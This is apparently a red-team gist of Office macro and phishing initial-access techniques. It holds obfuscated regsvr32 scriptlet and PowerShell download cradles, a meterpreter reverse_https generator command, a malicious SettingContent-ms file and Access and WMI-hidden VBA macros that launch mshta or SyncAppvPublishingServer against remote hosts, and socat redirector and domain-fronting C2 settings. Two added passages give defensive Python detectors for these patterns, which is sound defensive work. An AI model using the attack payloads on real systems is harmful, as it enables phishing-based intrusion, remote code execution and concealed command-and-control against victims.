@adon90
Last active August 27, 2022 13:24
1. Macro Web_Delivery + Invoke-Obfuscation
Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
e.g.
import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
2. Generate Macro (by enigma0x3)
iex(New-Object net.webClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1');
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1
3. Macroless OLE SettingContent-ms
python unicorn.py windows/meterpreter/reverse_https IP 443 hta
--------------------------
<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>C:\Windows\System32\mshta.exe http://192.168.1.43/LICENSE.txt</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>
--------------------------
* Note: give the database on the C&C 644 permissions
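From the defensive side, and added here rather than taken from the original gist: a small Python triage script that parses a .SettingContent-ms document of the shape shown in section 3 and flags a DeepLink that launches a script host or points at a remote URL. Both sample documents are constructed; the malicious one mirrors the section 3 file (same IP), and the benign one uses a control.exe DeepLink as an assumption about what a legitimate settings shortcut looks like.

```python
import re
import shlex
import xml.etree.ElementTree as ET

# SearchableContent and its children carry this default namespace in the file
NS = "{http://schemas.microsoft.com/Search/2013/SettingContent}"

# Script and LOLBin hosts that a Control Panel deep link has no reason to launch
SUSPICIOUS_HOSTS = {
    "mshta.exe", "regsvr32.exe", "powershell.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "syncappvpublishingserver.exe",
}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample mirroring the section 3 file
MALICIOUS_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>C:\Windows\System32\mshta.exe http://192.168.1.43/LICENSE.txt</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>
"""

# Constructed benign sample (assumed shape of a legitimate settings shortcut)
BENIGN_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\control.exe /name Microsoft.System</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>
"""


def analyze(xml_text):
    """Return the DeepLink, the executable it launches and a list of findings."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    node = root.find(f".//{NS}DeepLink")
    deeplink = (node.text or "").strip() if node is not None else ""
    if not deeplink:
        return {"deeplink": "", "executable": "", "findings": ["missing-deeplink"]}
    # posix=False keeps Windows backslashes intact instead of treating them as escapes
    tokens = shlex.split(deeplink, posix=False)
    executable = re.split(r"[\\/]", tokens[0].strip('"'))[-1].lower()
    findings = []
    if executable in SUSPICIOUS_HOSTS:
        findings.append(f"suspicious-host:{executable}")
    if URL_RE.search(deeplink):
        findings.append("remote-url")
    return {"deeplink": deeplink, "executable": executable, "findings": findings}


if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, analyze(doc))
```

The file is plain XML, so the same check runs at a mail gateway or in a file-scanning pipeline; the executable name, not the full path, is compared because the DeepLink may use environment variables or relative paths.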
4. .MAM Access Database
------------------------------
Public Function runme()
    runcalculator
End Function

Sub runcalculator()
    Shell ("mshta.exe http://IP/LICENSE.txt")
End Sub
------------------------------
5. SyncAppvPublishingServer
--------------------------------------------------
Sub Macro()
    Dim x64 As String
    x64 = "SyncAppvPublishingServer.exe ""n;WEBDELIVERY_PAYLOAD_W/O_POWERSHELL"""
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    ' Process is created through WMI (Win32_Process.Create) with a hidden window
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create x64
End Sub
--------------------------------------------------------
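As an added example from the detection side (not code from the original gist), a Python rule set run over constructed process-creation records (parent image, image, command line; the shape Sysmon Event ID 1 or EDR telemetry provides) covering the launch patterns of sections 1, 3, 4 and 5: an Office parent spawning a script host, mshta.exe given a remote URL, regsvr32 loading a remote scriptlet through scrobj.dll, and a script host whose parent is WmiPrvSE.exe. The events and the benign command lines are constructed; the IP and the regsvr32 arguments are the ones on the page, and the payload in the SyncAppvPublishingServer line is a placeholder.

```python
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe", "outlook.exe"}
SCRIPT_HOSTS = {
    "mshta.exe", "regsvr32.exe", "wscript.exe", "cscript.exe", "powershell.exe",
    "cmd.exe", "rundll32.exe", "syncappvpublishingserver.exe",
}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
SCRIPTLET_RE = re.compile(r"/i:\s*https?://|scrobj\.dll", re.IGNORECASE)

# Constructed process-creation records; indices 3 and 4 are benign controls
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\SyncAppvPublishingServer.exe",
     "command_line": 'SyncAppvPublishingServer.exe "n;<WEBDELIVERY_PAYLOAD placeholder>"'},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\MSACCESS.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://192.168.1.43/LICENSE.txt"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": "regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll"},
    {"parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32.exe /s C:\Windows\System32\example.dll"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "C:\Program Files\Example\help.hta"'},
]


def _exe(path):
    """Bare lowercase file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path.strip().strip('"'))[-1].lower()


def office_spawned_script_host(ev):
    return _exe(ev["parent_image"]) in OFFICE_PARENTS and _exe(ev["image"]) in SCRIPT_HOSTS


def wmi_launched_script_host(ev):
    # Win32_Process.Create (section 5) makes WmiPrvSE.exe the parent, not the Office process
    return _exe(ev["parent_image"]) == "wmiprvse.exe" and _exe(ev["image"]) in SCRIPT_HOSTS


def mshta_remote_url(ev):
    return _exe(ev["image"]) == "mshta.exe" and bool(URL_RE.search(ev["command_line"]))


def regsvr32_scriptlet(ev):
    return _exe(ev["image"]) == "regsvr32.exe" and bool(SCRIPTLET_RE.search(ev["command_line"]))


RULES = [
    ("office-spawned-script-host", office_spawned_script_host),
    ("wmi-launched-script-host", wmi_launched_script_host),
    ("mshta-remote-url", mshta_remote_url),
    ("regsvr32-scriptlet", regsvr32_scriptlet),
]


def detect(events):
    """Return (event index, rule name) for every rule that matches an event."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


if __name__ == "__main__":
    for idx, rule_name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_name} :: {SAMPLE_EVENTS[idx]['command_line']}")
```

Because the section 5 macro creates its process through WMI, the child's parent is WmiPrvSE.exe rather than WINWORD.EXE, so a rule that only looks for Office parents misses it; the WmiPrvSE parent rule and the command-line rules are what catch that variant.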
6. Domain Fronting + Phishing
Redirector:
socat TCP4-LISTEN:443,fork,reuseaddr TCP4:<C&C IP>:443
C&C:
set LHOST mscrl.microsoft.com
set HttpHostHeader xxxxxxxxxxxxx.azureedge.net